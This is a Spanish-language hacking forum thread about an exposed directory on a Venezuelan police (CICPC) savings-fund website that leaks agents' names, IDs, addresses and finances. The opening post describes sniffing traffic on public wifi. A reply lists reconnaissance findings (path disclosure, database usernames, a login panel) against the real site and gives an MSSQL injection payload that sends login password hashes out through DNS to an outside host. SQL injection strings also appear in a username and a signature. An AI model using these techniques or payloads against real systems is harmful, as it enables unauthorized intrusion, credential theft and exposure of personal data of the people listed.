comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

"Base de datos" del CICPC

  • 2 Respuestas
  • 1947 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado andergedon

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 6
  • High tech, low life
    • Ver Perfil
    • GitHub
« en: Noviembre 20, 2016, 04:54:56 pm »
¡Hola de nuevo! Me encontraba esta mañana en un parque, husmeando un poco el trafico de su wifi libre.

Mientras veía las peticiones DNS una me llamó la atención. "No tienes permisos para ver links. Registrate o Entra con tu cuenta" el CIPC es "Cuerpo de Investigaciones Científicas, Penales y Criminalísticas" de mi país (Venezuela)
Me pareció extraño que alguien navegue por ese tipo de páginas en una red completamente abierta.

Procedí entonces a buscar y escánear esa página, primero jugué con google un rato hasta que encontré "Index of /txt"


No tienes permisos para ver links. Registrate o Entra con tu cuenta


Lo que me llamó la atención en el sitio eran los .txt y sus nombres. Por ejemplo "AHORROS.txt" y su gran coincidencia con el nombre de la página.

Luego de abrir los archivos, BUM. Información que NO debería ser pública aparece.

Nombres completos, servicios afiliados a la caja de ahorros, disponibilidad de ahorros, deuda del aporte patronal, teléfono, dirección y documento de identidad








He visto antes esto de documentos guardados así por así en otras web. Pero de una de las ramas más importantes del cuerpo policial de Venezuela, no me lo esperaba. Hablamos de miles de líneas de datos personales de detectives/agentes de este cuerpo.
Ahora tengo más razones para quejarme de la ineficiencia de los cuerpos de seguridad en mi país...

Además de toda la información comprometida, hay un log de error muy extenso. No lo logro entender muy bien, no tengo mucha experiencia ahí. Pero los warning al mysql, también despiertan mis alarmas.



Cabe destacar que aún no he reportado nada de todo esto.

\x11\x12\x13

Desconectado kafkam

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: Rmanueld1
« Respuesta #1 en: Enero 31, 2017, 01:40:37 pm »
Soy Venezolano y pues, me entró curiosidad de revisar si de verdad todavía se mantenía esto... Qué te puedo decir, así estamos hermano.

Desconectado 'or '1'=1

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 2
  • 1;if+not(select+s_user)+<>'sa'+waitfor+delay+'1'--
    • Ver Perfil
    • Email
  • Skype: :)
« Respuesta #2 en: Enero 31, 2017, 04:31:04 pm »
Good job, dirbuster can give you that result and search engine dorks; example:





When you login POST response with the next parameters:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta



No tienes permisos para ver links. Registrate o Entra con tu cuenta show us the next:

/home/cajadeah/public_html/txt/ PATH DISCLOSURE
'simpadsa'@'localhost'
'cajacicp_bolivar'@'localhost'
'cajacicp_miranda'@'localhost'
 
No tienes permisos para ver links. Registrate o Entra con tu cuenta ulalah

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta  -> login panel
No tienes permisos para ver links. Registrate o Entra con tu cuenta wtf

Moar?

No tienes permisos para ver links. Registrate o Entra con tu cuenta  (nothing interesting)...



1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

 

¿Te gustó el post? COMPARTILO!



Base de datos de la upbc LOL

Iniciado por Mentas

Respuestas: 7
Vistas: 2605
Último mensaje Enero 09, 2016, 05:12:35 am
por Mentas
XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 2552
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX